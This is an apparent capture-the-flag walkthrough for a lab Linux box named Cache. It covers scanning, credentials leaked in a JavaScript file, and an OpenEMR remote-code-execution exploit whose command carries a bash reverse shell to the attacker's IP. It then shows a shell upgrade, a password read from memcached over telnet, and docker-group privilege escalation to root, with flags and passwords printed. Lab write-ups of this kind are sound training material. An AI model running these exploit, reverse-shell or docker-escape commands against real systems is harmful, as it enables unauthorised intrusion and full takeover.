Cache is Linux box which having IP address 10.10.10.188, Let’s start with nmap scan and some enumeration part.
#nmap
PORT STATE SERVICE VERSION 22/tcp open ssh OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0) | ssh-hostkey: | 2048 a9:2d:b2:a0:c4:57:e7:7c:35:2d:45:4d:db:80:8c:f1 (RSA) | 256 bc:e4:16:3d:2a:59:a1:3a:6a:09:28:dd:36:10:38:08 (ECDSA) |_ 256 57:d5:47:ee:07:ca:3a:c0:fd:9b:a8:7f:6b:4c:9d:7c (ED25519) 80/tcp open http Apache httpd 2.4.29 ((Ubuntu)) |http-favicon: Unknown favicon MD5: 6CE8D3334381134EB0A89D8FECE6EEB2 | http-methods: | Supported Methods: GET HEAD POST OPTIONS |_http-server-header: Apache/2.4.29 (Ubuntu) | http-title: OpenEMR Login |_Requested resource was interface/login/login.php?site=default Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
Visit web service on port 80, and got js file which contain username and password.

Visit web service on port 80, and got js file which contain username and password. After login we got nothing, after some time got hint with hms so added hms.htb to hosts file. And what we got Openemr over there.
Exploit: https://www.exploit-db.com/exploits/45161
$python openemr_rce.py http://hms.htb-u openemr_admin -p xxxxxx-c 'bash -i >& /dev/tcp/10.10.15.185/1337 0>&1'

Listen with nc and we are into system. 🙂
#user flag
Use python tty python3 -c ‘import pty; pty.spawn(“/bin/sh”)’
$ nc -lvp 1337 listening on [any] 1337 … connect to [10.10.15.185] from hms.htb [10.10.10.188] 41960 bash: cannot set terminal process group (2086): Inappropriate ioctl for device bash: no job control in this shell [email protected]:/var/www/hms.htb/public_html/interface/main$
Found two users one of the user named ash which got credentials in js file and got user.txt
$ cd /home $ ls ash luffy $ su ash Password: [email protected]_fun [email protected]:/home$ ls ash luffy [email protected]:/home$ cd ash [email protected]:~$ ls Desktop Documents Downloads Music Pictures Public user.txt [email protected]:~$ cat user.txt ba3ad6c2fb35d648301680f2b2b8dc34
After some time got telnet which running on port 11211
[email protected]:~$ ss -tnl ss -tnl State Recv-Q Send-Q Local Address:Port Peer Address:Port LISTEN 0 128 127.0.0.53%lo:53 0.0.0.0:* LISTEN 0 128 0.0.0.0:22 0.0.0.0:* LISTEN 0 80 127.0.0.1:3306 0.0.0.0:* LISTEN 0 128 127.0.0.1:11211 0.0.0.0:* LISTEN 0 128 *:80 *:* LISTEN 0 128 [::]:22 [::]:*
First connect via telnet and get passwd , got luffy : 0n3_p1ec3
[email protected]:~$ telnet localhost 11211 telnet localhost 11211 Trying ::1… Trying 127.0.0.1… Connected to localhost. Escape character is '^]'. get passwd VALUE passwd 0 9 0n3_p1ec3 END
#root flag
After login into luffy account, got prev esc. docker run -v /:/mnt –rm -it ubuntu chroot /mnt sh
[email protected]:~$ docker run -v /:/mnt --rm -it ubuntu chroot /mnt sh docker run -v /:/mnt --rm -it ubuntu chroot /mnt sh #id uid=0(root) gid=0(root) groups=0(root) #ls bin home lib64 opt sbin sys vmlinuz boot initrd.img lost+found proc snap tmp vmlinuz.old dev initrd.img.old media root srv usr etc lib mnt run swap.img var #cd root #ls root.txt #cat root.txt 13075205f94778ab0de9e50946e11c7e